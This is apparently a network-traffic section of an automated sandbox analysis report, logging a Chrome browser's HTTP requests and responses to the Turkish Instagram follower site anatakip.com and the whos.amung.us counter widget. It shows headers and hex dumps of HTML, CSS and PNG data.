                    2024-05-26 22:58:02 UTC1369INData Raw: 72 2e 63 73 73 3f 76 3d 76 33 2e 31 2e 35 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6e 70 72 6f 67 72 65 73 73 2f 6e 70 72 6f 67 72 65 73 73 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 49 6e 73 74 61 67 72 61 6d 20 48 61 6b 6b c4 b1 6e 64 61 20 42 69 6c 6d 65 6e 69 7a 20 47 65 72 65 6b 65 6e 6c 65 72 20 7c 20 41 6e 61 54 61 6b 69 70 20 6b 65 6e 64 69 6e 69 7a 69 20 69 6e 73 74 61 67 72 61 6d 20 65 6e 20 69 79 69 20 70 72 6f 66 69 6c 69 20 68
                    Data Ascii: r.css?v=v3.1.5"><link rel="stylesheet" href="/assets/nprogress/nprogress.css"><link rel="shortcut icon" href="/assets/logo/favicon.png" type="image/x-icon" /><title>Instagram Hakknda Bilmeniz Gerekenler | AnaTakip kendinizi instagram en iyi profili h
                    2024-05-26 22:58:02 UTC1369INData Raw: 20 70 75 6c 6c 2d 6c 65 66 74 22 3e 0a 3c 6c 69 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 74 6e 22 3e 0a 3c 61 20 69 64 3d 22 6c 6f 67 69 6e 41 73 55 73 65 72 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 20 68 72 65 66 3d 22 2f 6c 6f 67 69 6e 22 3e 0a 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 73 69 67 6e 2d 69 6e 22 3e 3c 2f 69 3e 0a 47 c4 b0 52 c4 b0 c5 9e 0a 3c 2f 61 3e 0a 3c 2f 70 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 20 63 6f 6c 6c 61 70 73 65 64 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d 74 61 72 67 65 74 3d 22 2e 6e 61 76
                    Data Ascii: pull-left"><li><p class="navbar-btn"><a id="loginAsUser" class="btn btn-primary" href="/login"><i class="fa fa-sign-in"></i>GR</a></p></li></ul><button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target=".nav
                    2024-05-26 22:58:02 UTC1369INData Raw: 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 33 22 3e 0a 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 67 2d 72 65 73 70 6f 6e 73 69 76 65 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2e 70 6e 67 22 20 2f 3e 0a 3c 70 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6e 61 74 61 6b 69 70 2e 63 6f 6d 22 3e 69 6e 73 74 61 67 72 61 6d 20 62 65 c4 9f 65 6e 69 20 76 65 20 74 61 6b 69 70 c3 a7 69 20 73 69 74 65 73 69 3c 2f 61 3e 0a 3c 2f 70 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 75 6e 73 74 79 6c 65 64 22 3e 0a 3c 6c 69 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 74 6f 6f 6c 73 22 3e 41 72 61 c3
                    Data Ascii: v class="container"><div class="row"><div class="col-md-3"><img class="img-responsive" src="/assets/logo/logo.png" /><p><a href="https://anatakip.com">instagram beeni ve takipi sitesi</a></p><ul class="list-unstyled"><li><a href="/tools">Ara
                    2024-05-26 22:58:02 UTC1369INData Raw: 0a 3c 68 33 3e c4 b0 6c 65 74 69 c5 9f 69 6d 20 42 69 6c 67 69 6c 65 72 69 3c 2f 68 33 3e 0a 3c 70 3e 4b 72 65 64 69 20 73 61 74 c4 b1 6e 20 61 6c 6d 61 6b 20 69 c3 a7 69 6e 20 61 c5 9f 61 c4 9f c4 b1 64 61 20 62 75 6c 75 6e 61 6e 20 69 6c 65 74 69 c5 9f 69 6d 20 6b 61 6e 61 6c 6c 61 72 c4 b1 6e 64 61 6e 20 62 69 7a 65 20 75 6c 61 c5 9f 61 62 69 6c 69 72 73 69 6e 69 7a 2e 3c 2f 70 3e 0a 3c 70 3e 0a 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 30 61 66 66 30 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 73 6b 79 70 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 53 6b 79 70 65 20 3c 2f 73 70 61 6e 3e 0a 3a 0a 3c 62 3e 3c 2f 62 3e 0a 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64
                    Data Ascii: <h3>letiim Bilgileri</h3><p>Kredi satn almak iin aada bulunan iletiim kanallarndan bize ulaabilirsiniz.</p><p><span style="color:#00aff0"><i class="fa fa-skype" aria-hidden="true"></i> Skype </span>:<b></b></p></div></div></d
                    2024-05-26 22:58:02 UTC1369INData Raw: 72 6f 6a 65 63 74 28 29 3b 0a 09 09 09 0a 09 09 09 09 09 09 0a 09 09 09 09 09 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 3e 0a 09 09 09 2f 2a 20 54 68 65 20 4d 6f 64 61 6c 20 28 62 61 63 6b 67 72 6f 75 6e 64 29 20 2a 2f 0a 09 09 09 2e 6d 6f 64 61 6c 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 2f 2a 20 48 69 64 64 65 6e 20 62 79 20 64 65 66 61 75 6c 74 20 2a 2f 0a 09 09 09 09 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 2f 2a 20 53 74 61 79 20 69 6e 20 70 6c 61 63 65 20 2a 2f 0a 09 09 09 09 7a 2d 69 6e 64 65 78 3a 20 31 3b 20 2f 2a 20 53 69 74 20 6f 6e 20 74 6f 70 20 2a 2f 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 30 70 78 3b 20 2f 2a 20 4c 6f 63 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 62 6f 78 20 2a 2f 0a
                    Data Ascii: roject();</script><style>/* The Modal (background) */.modal {display: none; /* Hidden by default */position: fixed; /* Stay in place */z-index: 1; /* Sit on top */padding-top: 100px; /* Location of the box */
                    2024-05-26 22:58:02 UTC550INData Raw: 6f 64 61 6c 20 2e 6d 6f 64 61 6c 2d 68 65 61 64 65 72 3a 3a 62 65 66 6f 72 65 2c 20 23 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 4d 6f 64 61 6c 20 2e 6d 6f 64 61 6c 2d 68 65 61 64 65 72 3a 3a 61 66 74 65 72 2c 20 23 6c 6f 67 67 65 64 41 6e 6e 6f 75 6e 63 65 6d 65 6e 74 4d 6f 64 61 6c 20 2e 6d 6f 64 61 6c 2d 68 65 61 64 65 72 3a 3a 62 65 66 6f 72 65 2c 20 23 6c 6f 67 67 65 64 41 6e 6e 6f 75 6e 63 65 6d 65 6e 74 4d 6f 64 61 6c 20 2e 6d 6f 64 61 6c 2d 68 65 61 64 65 72 3a 3a 61 66 74 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 09 09 09 7d 0a 0a 09 09 09 23 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 4d 6f 64 61 6c 20 2e 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 2c 20 23 6c 6f 67 67 65 64 41 6e 6e 6f 75 6e 63 65 6d 65 6e 74 4d 6f 64 61 6c 20 2e 6d
                    Data Ascii: odal .modal-header::before, #announcementModal .modal-header::after, #loggedAnnouncementModal .modal-header::before, #loggedAnnouncementModal .modal-header::after {display: none;}#announcementModal .modal-content, #loggedAnnouncementModal .m
                    2024-05-26 22:58:02 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    52192.168.2.549805104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:03 UTC789OUTGET /assets/logo/logo.png HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/blog
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764277.0.0.0; _ga=GA1.2.1095029423.1716764258
                    2024-05-26 22:58:03 UTC746INHTTP/1.1 404 Not Found
                    Date: Sun, 26 May 2024 22:58:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: BYPASS
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z4ri%2B4IZqSpH8lL33Idi9RRUpAYJunYFXy58KzKqfOoSosQ6fc%2FpVyfsN%2B3cPXzRrHSbiIWtBsd092GGV9b6ZXqoG%2BkTz8w3jf1hPnsFFA9Atu%2B%2FXrbDJgzi9jQIjhg%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15e217cb242e9-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:03 UTC623INData Raw: 31 63 37 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 70 61
                    Data Ascii: 1c75<!DOCTYPE html><html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="/assets/bootstrap/css/bootstrap-pa
                    2024-05-26 22:58:03 UTC1369INData Raw: 73 73 65 74 73 2f 73 74 79 6c 65 2f 70 61 70 65 72 2e 63 73 73 3f 76 3d 76 33 2e 31 2e 35 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6e 70 72 6f 67 72 65 73 73 2f 6e 70 72 6f 67 72 65 73 73 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 41 6e 61 54 61 6b 69 70 20 6b 65 6e 64 69 6e 69 7a 69 20 69 6e 73 74 61 67 72 61 6d 20 65 6e 20 69 79 69 20 70 72 6f 66 69 6c 69 20 68 61 6c 69 6e 65 20 67 65 74
                    Data Ascii: ssets/style/paper.css?v=v3.1.5"><link rel="stylesheet" href="/assets/nprogress/nprogress.css"><link rel="shortcut icon" href="/assets/logo/favicon.png" type="image/x-icon" /><title>Page Not Found | AnaTakip kendinizi instagram en iyi profili haline get
                    2024-05-26 22:58:03 UTC1369INData Raw: 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 54 6f 67 67 6c 65 20 6e 61 76 69 67 61 74 69 6f 6e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 20 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 6c 65 66 74 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d
                    Data Ascii: bar-collapse" aria-expanded="false"><span class="sr-only">Toggle navigation</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button></div><div class="navbar-collapse collapse navbar-left"><ul class=
                    2024-05-26 22:58:03 UTC1369INData Raw: 33 22 3e 0a 3c 68 35 3e 4b 69 6d 6c 65 72 20 4b 75 6c 6c 61 6e 61 62 69 6c 69 72 3c 2f 68 35 3e 0a 3c 70 3e 49 6e 73 74 61 67 72 61 6d 20 c3 bc 79 65 6c 69 c4 9f 69 20 6f 6c 61 6e 20 68 65 72 6b 65 73 20 73 69 73 74 65 6d 69 20 6b 75 6c 6c 61 6e 61 62 69 6c 69 72 2e 20 49 6e 73 74 61 67 72 61 6d 20 68 65 73 61 62 c4 b1 6e c4 b1 7a 6c 61 20 67 69 72 69 c5 9f 20 79 61 70 c4 b1 6e 20 76 65 20 68 65 6d 65 6e 20 6b 75 6c 6c 61 6e 6d 61 79 61 20 62 61 c5 9f 6c 61 79 c4 b1 6e 2e 20 4b 75 6c 6c 61 6e c4 b1 6d 20 c3 bc 63 72 65 74 73 69 7a 64 69 72 2e 20 4b 72 65 64 69 20 73 61 74 c4 b1 6e 20 61 6c 6d 61 64 c4 b1 6b c3 a7 61 20 68 69 c3 a7 62 69 72 20 c3 bc 63 72 65 74 20 c3 b6 64 65 6d 65 7a 73 69 6e 69 7a 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63
                    Data Ascii: 3"><h5>Kimler Kullanabilir</h5><p>Instagram yelii olan herkes sistemi kullanabilir. Instagram hesabnzla giri yapn ve hemen kullanmaya balayn. Kullanm cretsizdir. Kredi satn almadka hibir cret demezsiniz.</p></div><div c
                    2024-05-26 22:58:03 UTC1369INData Raw: 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 63 6f 72 65 2f 63 6f 72 65 2e 6a 73 3f 76 3d 33 2e 31 2e 31 30 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 09 09 09 28 66 75 6e 63 74 69 6f 6e 20 28 69 2c 20 73 2c 20 6f 2c 20 67 2c 20 72 2c 20 61 2c 20 6d 29 20 7b 0a 09 09 09 09 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 20 3d 20 72 3b 0a 09 09 09 09 69 5b 72 5d 20 3d 20 69 5b 72 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 09 09 09 28 69 5b 72 5d 2e 71 20 3d 20 69 5b 72 5d 2e 71 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 0a 09 09 09 09 7d 2c 20
                    Data Ascii: script><script src="/assets/core/core.js?v=3.1.10"></script><script type="text/javascript">(function (i, s, o, g, r, a, m) {i['GoogleAnalyticsObject'] = r;i[r] = i[r] || function () {(i[r].q = i[r].q || []).push(arguments)},
                    2024-05-26 22:58:03 UTC1194INData Raw: 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 61 61 61 61 61 61 3b 0a 09 09 09 09 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6c 6f 73 65 3a 68 6f 76 65 72 2c 0a 09 09 09 2e 63 6c 6f 73 65 3a 66 6f 63 75 73 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 09 09 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 09 09 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 6d 6f 64 61 6c 2d 6f 70 65 6e 20 2e 6d 6f 64 61 6c 20 7b 0a 09 09 09 09 6f 76 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 0a 09 09 09 09 6f 76 65 72 66 6c
                    Data Ascii: {color: #aaaaaa;float: right;font-size: 28px;font-weight: bold;}.close:hover,.close:focus {color: #000;text-decoration: none;cursor: pointer;}.modal-open .modal {overflow-x: hidden;overfl
                    2024-05-26 22:58:03 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                    Data Ascii: 1
                    2024-05-26 22:58:03 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    53192.168.2.549807104.22.75.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:03 UTC589OUTGET /widget/instamark.png HTTP/1.1
                    Host: whos.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:03 UTC373INHTTP/1.1 307 Temporary Redirect
                    Date: Sun, 26 May 2024 22:58:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: no-cache, no-store, must-revalidate
                    location: https://widgets.amung.us/classic/13/1391.png
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 88a15e25eaed43f8-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:03 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    54192.168.2.549809104.22.75.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:04 UTC589OUTGET /widget/anatakipx.png HTTP/1.1
                    Host: whos.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:04 UTC371INHTTP/1.1 307 Temporary Redirect
                    Date: Sun, 26 May 2024 22:58:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: no-cache, no-store, must-revalidate
                    location: https://widgets.amung.us/classic/00/53.png
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 88a15e2a4bd22394-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:04 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    55192.168.2.549811104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:04 UTC591OUTGET /classic/13/1391.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:04 UTC432INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:04 GMT
                    Content-Type: image/png
                    Content-Length: 1627
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:11 GMT
                    etag: "4c149ecf-65b"
                    expires: Wed, 15 May 2024 21:16:59 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 1042865
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15e2a9cb84319-EWR
                    2024-05-26 22:58:04 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 d9 50 4c 54 45 ff ff ff c8 c8 c8 c9 c9 c9 d2 d2 d2 c1 c1 c1 84 84 84 80 80 80 e9 e9 e9 d4 d4 d4 7d 7d 7d 7a 7a 7a bb bb bb b7 b7 b7 c6 c6 c6 e3 e3 e3 e4 e4 e4 ae ae ae d6 d6 d6 ea ea ea 99 99 99 bf bf bf d3 d3 d3 77 77 77 d1 d1 d1 b9 b9 b9 74 74 74 e7 e7 e7 88 88 88 e1 e1 e1 c7 c7 c7 76 76 76 72 72 72 e2 e2 e2 90 90 90 92 92 92 93 93 93 a5 a5 a5 ad ad ad aa aa aa a8 a8 a8 a6 a6 a6 a4 a4 a4 8d 8d 8d e8 e8 e8 a2 a2 a2 d0 d0 d0 70 70 70 cf cf cf a0 a0 a0 ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6 26 2c 88 37 3b 7f
                    Data Ascii: PNGIHDRQpPLTE}}}zzzwwwtttvvvrrrppp\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX&,7;
                    2024-05-26 22:58:04 UTC690INData Raw: e6 c9 c2 39 bb fa 7e 26 fa 5c 0c 2f 8f 37 ca 02 54 94 18 c9 3a 71 fd ab e0 ce f0 c8 ff 67 c8 c3 a8 28 49 46 4c db f7 85 78 f4 62 3e b7 ca ac 82 83 02 65 b6 9a 79 73 82 49 ec e5 11 14 e4 11 e8 d0 97 15 8f 91 26 de 6c 36 8f 99 fb 8d 75 c9 6c 66 cb f8 3d 66 9e 2a 00 c0 df 6c ab 69 13 c2 1b 02 48 02 08 20 c9 df be 2f a5 00 a3 e8 5c ad c1 70 f3 27 6b ed fa cb 8b b8 b0 b9 9f 81 a5 14 8b 3b 42 07 83 93 c6 d0 88 2c 62 25 89 b5 40 69 d7 f7 ba 88 5c 63 d1 63 66 64 29 eb 16 c3 30 bb b9 54 3a 83 61 89 c4 79 0c 88 18 47 22 f0 21 2b 7f 50 13 6a da f5 f5 22 d7 98 9e f4 ce 74 af 98 98 6c 3a 63 32 f1 b1 f8 ac c9 02 da 9b 1c f8 42 c3 bf 07 35 a0 86 5d 9f 4a 85 11 fd 98 ce 5c f6 83 78 96 f0 8c a6 c7 ae 9c c0 e6 1f 09 b4 00 fc 68 07 0d 00 1a 90 52 bd 5a 34 bb 42 55 db 3e 75
                    Data Ascii: 9~&\/7T:qg(IFLxb>eysI&l6ulf=f*liH /\p'k;B,b%@i\ccfd)0T:ayG"!+Pj"tl:c2B5]J\xhRZ4BU>u


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    56192.168.2.549812104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:05 UTC589OUTGET /classic/00/53.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:05 UTC432INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:05 GMT
                    Content-Type: image/png
                    Content-Length: 1509
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:09 GMT
                    etag: "4c149ecd-5e5"
                    expires: Wed, 15 May 2024 19:36:42 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 1048883
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15e2f0c3419fb-EWR
